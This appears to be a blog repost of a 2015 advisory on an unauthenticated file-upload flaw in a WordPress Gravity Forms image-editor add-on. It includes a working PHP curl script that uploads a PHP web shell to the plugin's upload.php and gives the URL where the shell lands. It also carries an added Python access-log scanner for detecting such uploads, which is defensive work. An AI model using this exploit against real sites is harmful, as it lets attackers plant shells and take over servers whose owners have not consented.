WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload Vulnerability

Assalamualaikum,

This time I want to share the exploit for the WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload Vulnerability, so let's get straight to it :D

= Author: Larry W. Cashdollar, @_larry0
= Date: 2015-06-07
= Download Site: https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms
= Vendor: Waters Edge Web Design and NetherWorks LLC
= Vendor Notified: 2015-06-08
= Advisory: http://www.vapid.dhs.org/advisory.php?v=125
= Vulnerability in 'upload.php': BLANK Page
=======================================================================

Vulnerability:

There is a remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms/includes/upload.php, as an unauthenticated user can upload any file to the system, including a .php file. The upload.php doesn't check that the user is authenticated, and a simple POST will allow arbitrary code to be uploaded to the server.

Exploit Code :

<?php

/*Remote shell upload exploit for aviary-image-editor-add-on-for-gravity-forms v3.0beta */
/*Larry W. Cashdollar @_larry0

6/7/2015
shell will be located http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php
 */


 $target_url = 'http://www.vapidlabs.com/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php';
 $file_name_with_full_path = '/var/www/nameshell.php';
 echo "POST to $target_url $file_name_with_full_path";
 $post = array('name' => 'nameshell.php','gf_aviary_file'=>'@'.$file_name_with_full_path);
 $ch = curl_init();
 curl_setopt($ch, CURLOPT_URL,$target_url);
 curl_setopt($ch, CURLOPT_POST,1);
 curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
 $result=curl_exec ($ch);
 curl_close ($ch);
 echo "<hr>";
 echo $result;
 echo "<hr>";


 ?> 
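
On the defensive side, the request pattern the advisory describes can be hunted in web server access logs. The following is an added example, not part of the original advisory or this post: a Python scan that flags POSTs to the plugin's upload.php and script requests under the gform_aviary upload directory. The Combined Log Format, the sample log lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Both paths are taken from the advisory; the rest of this script is assumed.
UPLOAD_ENDPOINT = ("/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms"
                   "/includes/upload.php")
UPLOAD_DIR = "/wp-content/uploads/gform_aviary/"
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$")
# Combined Log Format: ip ident user [time] "METHOD target PROTO" status ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Jun/2015:10:00:01 +0000] "POST ' + UPLOAD_ENDPOINT
    + ' HTTP/1.1" 200 0 "-" "curl"',
    '192.0.2.10 - - [08/Jun/2015:10:00:05 +0000] "GET ' + UPLOAD_DIR
    + '_example.php HTTP/1.1" 200 120 "-" "curl"',
    '198.51.100.7 - - [08/Jun/2015:10:02:00 +0000] "GET ' + UPLOAD_DIR
    + 'photo.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [08/Jun/2015:10:03:00 +0000] "GET ' + UPLOAD_DIR
    + 'x.PHP?c=1 HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

def normalise(target):
    """Drop the query string, decode %-escapes, collapse '//' and lowercase."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path).lower()

def scan(lines):
    """Return findings as (kind, client_ip, timestamp, path) tuples."""
    findings, uploaders = [], set()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        ip, ts, method, target, status = m.groups()
        path, served = normalise(target), status.startswith("2")
        if method == "POST" and path.endswith(UPLOAD_ENDPOINT):
            uploaders.add(ip)
            findings.append(("upload_post", ip, ts, path))
        elif UPLOAD_DIR in path and SCRIPT_EXT.search(path):
            # Script under the upload dir; worst if served (2xx) to an earlier uploader.
            kind = "script_probe" if not served else (
                "script_served_after_upload" if ip in uploaders else "script_served")
            findings.append((kind, ip, ts, path))
    return findings

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Any `upload_post` finding on a site that does not use the plugin's editor, or any `script_served*` finding at all, is worth a look at the files in that directory.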


That's all, and thank you,
Wassalamualaikum wr. wb.
